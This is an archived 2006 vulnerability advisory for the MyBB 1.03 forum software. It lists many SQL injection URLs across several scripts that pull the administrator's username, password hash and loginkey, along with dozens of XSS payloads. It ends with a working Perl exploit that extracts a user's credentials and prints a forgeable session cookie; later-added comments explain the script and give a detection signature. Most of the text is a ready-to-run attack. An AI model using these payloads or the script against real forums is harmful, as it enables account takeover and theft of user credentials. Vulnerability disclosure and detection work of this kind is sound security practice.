MyBB-1.03.txt

2006-02-14T00:00:00
ID PACKETSTORM:43864
Type packetstorm
Reporter HACKERS PAL
Modified 2006-02-14T00:00:00

Description

                                        
                                            Multiple Injections in MyBB 1.03  
  
All injections and vulnerabilities discovered by : HACKERS PAL  
  
Two days ago I decided to download the files of the new MyBB forum version, and there was the disaster.  
  
There are many XSS and SQL injection vulnerabilities in the new protected version.  
  
I also made an exploit which gets the table prefix and gives you the admin information and the value you should set in the cookie.  
  
The mods forum is affected by all of these vulnerabilities, but the main forum and some old versions are not.  
  
url : http://mods.mybboard.com/forum/index.php  
  
0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0  
  
SQL injections  
in misc.php  
  
Get The Admin username  
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
Get The Admin password  
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
Get The Loginkey  
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
in private.php  
  
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*  
  
After adding the values, click on the [Or Select a Buddy:] options: in the first one you will find the admin's user name, in the second the password, and in the third the loginkey.  
  
in showteam.php  
user name  
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*  
  
password  
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*  
  
loginkey  
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*  
  
in usercp.php  
user name  
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*  
  
user password  
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*  
  
user loginkey  
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*  
----------------------------------------------------  
xss injections  
  
in any file in the forum like forumdisplay.php?fid=1  
  
  
after the link  
  
add  
&"></a><script>alert(document.cookie);</script>&  
  
  
-----------------------------------------------------  
if the forum is closed  
global.php?bbclosedwarning=<script>alert(document.cookie);</script>  
  
in index.php  
index.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>  
  
in calendar.php  
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=<script>alert(document.cookie);</script>  
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=<script>alert(document.cookie);</script>  
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=<script>alert(document.cookie);</script>  
  
in editpost.php  
editpost.php?pid=1&GLOBALS[]=1&attachments=<script>alert(document.cookie);</script>  
  
in forumdisplay.php  
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=<script>alert(document.cookie);</script>  
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>  
  
These vulnerabilities work only if the forum is a threads forum.  
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>  
forumdisplay.php?fid=2&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>  
  
in memberlist.php  
memberlist.php?GLOBALS[]=1&member=<script>alert(document.cookie);</script>  
  
in misc.php  
misc.php?action=help&GLOBALS[]=1&sections=<script>alert(document.cookie);</script>  
misc.php?action=whoposted&GLOBALS[]=1&whoposted=<script>alert(document.cookie);</script>  
misc.php?action=smilies&GLOBALS[]=1&smilies=<script>alert(document.cookie);</script>  
  
in online.php  
online.php?action=today&GLOBALS[]=1&todayrows=<script>alert(document.cookie);</script>  
  
in portal.php  
portal.php?GLOBALS[]=1&onlinemembers=<script>alert(document.cookie);</script>  
portal.php?GLOBALS[]=1&threadlist=<script>alert(document.cookie);</script>  
portal.php?GLOBALS[]=1&announcements=<script>alert(document.cookie);</script>  
  
in private.php  
private.php?GLOBALS[]=1&messagelist=<script>alert(document.cookie);</script>  
private.php?action=tracking&GLOBALS[]=1&readmessages=<script>alert(document.cookie);</script>  
private.php?action=tracking&GLOBALS[]=1&unreadmessages=<script>alert(document.cookie);</script>  
private.php?action=folders&GLOBALS[]=1&folderlist=<script>alert(document.cookie);</script>  
private.php?action=folders&GLOBALS[]=1&newfolders=<script>alert(document.cookie);</script>  
  
in showteam.php  
showteam.php?GLOBALS[]=1&usergrouprows=<script>alert(document.cookie);</script>  
showteam.php?GLOBALS[]=1&usergroups=<script>alert(document.cookie);</script>  
  
in showthread.php  
showthread.php?tid=1&GLOBALS[]=1&posts=<script>alert(document.cookie);</script>  
  
if there is a poll in the thread  
showthread.php?tid=1&GLOBALS[]=1&polloptions=<script>alert(document.cookie);</script>  
  
in stats.php  
stats.php?GLOBALS[]=1&mostreplies=<script>alert(document.cookie);</script>  
  
in usercp.php  
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&returndatesel=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&select=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&requiredfields=<script>alert(document.cookie);</script>  
usercp.php?action=profile&GLOBALS[]=1&customfields=<script>alert(document.cookie);</script>  
usercp.php?action=options&GLOBALS[]=1&langoptions=<script>alert(document.cookie);</script>  
usercp.php?action=options&GLOBALS[]=1&tppoptions=<script>alert(document.cookie);</script>  
usercp.php?action=options&GLOBALS[]=1&pppoptions=<script>alert(document.cookie);</script>  
usercp.php?action=favorites&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>  
usercp.php?action=favorites&GLOBALS[]=1&folder="><script>alert(document.cookie);</script>  
usercp.php?action=subscriptions&GLOBALS[]=1&threads=<script>alert(document.cookie);</script>  
usercp.php?action=subscriptions&GLOBALS[]=1&folder=<script>alert(document.cookie);</script>  
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>  
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=<script>alert(document.cookie);</script>  
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=<script>alert(document.cookie);</script>  
usercp.php?action=avatar&GLOBALS[]=1&galleries=<script>alert(document.cookie);</script>  
usercp.php?action=editlists&GLOBALS[]=1&buddylist=<script>alert(document.cookie);</script>  
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=<script>alert(document.cookie);</script>  
usercp.php?action=editlists&GLOBALS[]=1&newlist=<script>alert(document.cookie);</script>  
usercp.php?action=drafts&GLOBALS[]=1&drafts=<script>alert(document.cookie);</script>  
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=<script>alert(document.cookie);</script>  
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=<script>alert(document.cookie);</script>  
  
-----------------------------------------  
  
--- The Exploit ---  
  
#!/bin/env perl  
#//-------------------------------------------------------------#  
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #  
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #  
#// Special Greets For SG (SecurityGurus) Team And Members #  
#// http://WwW.SoQoR.NeT #  
#//-------------------------------------------------------------#  
#
# Proof-of-concept for the showteam.php SQL injection described in the
# advisory above.
#
# Usage: perl <script> <forum base URL> <numeric user id>
#
# The script issues four GET requests to showteam.php. Each carries a
# "GLOBALS[]=1" parameter plus a "comma=" parameter holding the injected
# SQL; how "GLOBALS[]" lets "comma" reach the query is not shown here
# (presumably it depends on PHP's register_globals handling of the time --
# confirm against the affected MyBB source). Each response is scraped with
# a regular expression, so every printed value is only as reliable as the
# HTML the remote page happens to emit.
#
# For defenders: every request is a plain HTTP GET whose query string
# contains "GLOBALS[]=" together with "union%20select" and a trailing "/*".
# That combination is a distinctive signature for access-log review and
# WAF rules, and it never legitimately appears in showteam.php traffic.
  
use LWP::Simple;  
print "\n#####################################################";  
print "\n# MyBB Forum Exploit By : HACKERS PAL #";  
print "\n# Http://WwW.SoQoR.NeT #";  
# Both positional arguments are required. The check is on truthiness, so
# an empty string or a user id of "0" is also treated as missing.
if(!$ARGV[0] or !$ARGV[1]) {  
print "\n# -- Usage: #";  
print "\n# -- perl $0 [Full-Path] [User ID] #";  
print "\n# -- Example: #";  
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";  
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";  
print "\n#####################################################";  
exit(0);  
}  
else  
{  
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";  
print "\n#####################################################";  
$web=$ARGV[0];  
$id=$ARGV[1];  
# Request 1: discover the table prefix. The "comma=/*" value is expected to
# make the page expose the query text (presumably via a database error that
# is echoed back); the prefix is whatever sits between "FROM " and
# "users u WHERE" in that text. Falls back to the default "mybb_" if the
# pattern does not match.
$url = "showteam.php?GLOBALS[]=1&comma=/*";  
$site="$web/$url";  
# LWP::Simple::get returns undef on failure. Note that $! is errno, not an
# HTTP status, so the die message may carry no useful detail.
$page = get($site) || die "[-] Unable to retrieve: $!";  
$page =~ m/FROM (.*)users u WHERE/;  
$prefix=$1;  
if(!$1)  
{  
$prefix="mybb_";  
}  
# Request 2: union-select the username of user $id. The page is expected to
# render the injected value inside <b><i>...</i></b>.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
print "\n[+] Connected to: $ARGV[0]\n";  
print "[+] User ID is : $id ";  
print "\n[+] Table Prefix is : $prefix";  
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";  
# In Perl, $1 keeps the value of the last *successful* match, so when the
# match above fails this check still sees the earlier capture and the
# failure message may not be printed.
print "\n[-] Unable to retrieve User Name\n" if(!$1);  
# Request 3: union-select the stored password value of user $id. The script
# labels it an MD5 hash; nothing on this page shows how MyBB 1.03 stored
# passwords, so treat that label as the author's assumption.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";  
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);  
print"\n[!] Watch out ... The Cookie Value is comming\n";  
# Request 4: union-select the loginkey of user $id and print it in the
# "mybbuser" cookie layout used by the script's own format string below
# (user id, an underscore, then the loginkey). This is the value that makes
# a leaked loginkey equivalent to a session: rotating loginkeys after an
# incident invalidates it.
$url = "showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20".$prefix."users%20where%20uid=$id/*";  
$site="$web/$url";  
$page = get($site) || die "[-] Unable to retrieve: $!";  
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";  
# Same caveat as above: $1 still holds the previous capture if this match
# failed, so this message is not a reliable failure indicator.
print "[-] Unable to retrieve Login Key\n" if(!$1);  
}  
  
# WwW.SoQoR.NeT  